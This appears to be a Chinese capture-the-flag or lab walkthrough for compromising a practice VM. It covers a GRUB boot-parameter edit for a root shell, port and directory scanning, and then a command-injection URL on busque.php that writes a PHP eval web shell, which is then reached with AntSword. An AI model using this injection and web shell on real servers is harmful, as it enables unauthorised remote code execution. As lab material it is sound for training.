第0步:
打开靶机,按下shift,出现下图界面
在此页面按下e键,进入如下界面, 将ro 替换为 rw signie init=/bin/bash
替换完毕后,按下Ctrl键+X键,进入如下页面
ip a查看网卡信息
编辑配置文件网卡信息, 英文键盘的斜杠按不出来,需要按数字键盘的斜杠
第一步:确定靶机IP为192.168.179.129
第二步:扫描后台及开放端口
第三步:进行敏感目录及文件扫描
#200
http://192.168.179.129/site/index.html (CODE:200|SIZE:10190)
http://192.168.179.129/site/wordpress/index.html (CODE:200|SIZE:10190)
#端口
192.168.179.129:80
192.168.179.129:21第四步:访问扫描出来的可能有价值的文件及端口
第五步:发现可以传参的地方,尝试传一个id,得到结果
第六步:进一步,尝试上传一句话木马
#URL
http://192.168.179.129/site/busque.php?buscar=echo '<?php eval($_POST["cmd"]);' > shell.php第七步:使用蚁剑进行连接
#URL地址
http://192.168.179.129/site/shell.phpFROM IYU_